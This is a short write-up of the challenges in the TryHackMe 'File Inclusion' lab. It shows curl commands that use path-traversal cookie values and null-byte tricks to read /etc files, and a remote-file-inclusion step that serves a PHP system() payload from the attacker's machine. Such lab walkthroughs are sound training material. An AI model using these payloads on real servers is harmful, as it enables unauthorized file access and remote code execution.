File Inclusion (TryHackMe)
Table of Contents
1 Intro
This is a write up for the Challenges part of the TryHackMe room File Inclusion.
2 Challenges
2.1 Flag 1
On the right hand side of Firefox open the menu > Web Developer >
. In the html source code find the form tag and change the
method from GET
. Then on the actual web page fill /etc/flag1
in the form and press the include button. This should reveal the flag.
2.2 Flag 2
From the hint it is clear that we have to edit the cookie to find the flag. To inspect the cookie run:
curl -v
and find the cookie among the header of the output. It has the value
Cookie: THM=Guest
. The obvious thing is to try and change the value
curl -H 'Cookie: THM=Admin' -o flag2.txt
which reveals the admin page. Since there is not input form on this page and it is a LFI room the next thing to try is to change the value of the cookie to the file path to the flag. After a few tries the correct value was found:
curl -H 'Cookie: THM=../../../../etc/flag2%00' -o flag2.txt
Locate the flag at the end of the file flag2.txt
2.3 Flag 3
The url input is filtered, everything that is not a-z is filtered
out. To get around this change the method from get to GET
and set the data to be posted to /etc/flag3%00
. The %00
necessary to prevent the .php
from being added at the end as
explained previously in the room.
curl -v http://ip/challenges/chall3.php -X POST -d 'file=/etc/flag3%00' -o flag3.txt
Locate the flag at the end of the file flag3.txt
2.4 Playground
Since this is a RFI exercise we first need to create a .php
that will execute the command we want, hostname
echo "<?PHP echo system('hostname') ?>" > rfi.php
Next we need a simple server that will host our file. The simplest way to do this is with python.
python -m http.server &
And finally add the file as a parameter in the url to get the hostname:
Note: the IP of the remote file is the IP of the attackbox and for the port number see the output of the python command. The port number defaults to 8000 but can be different.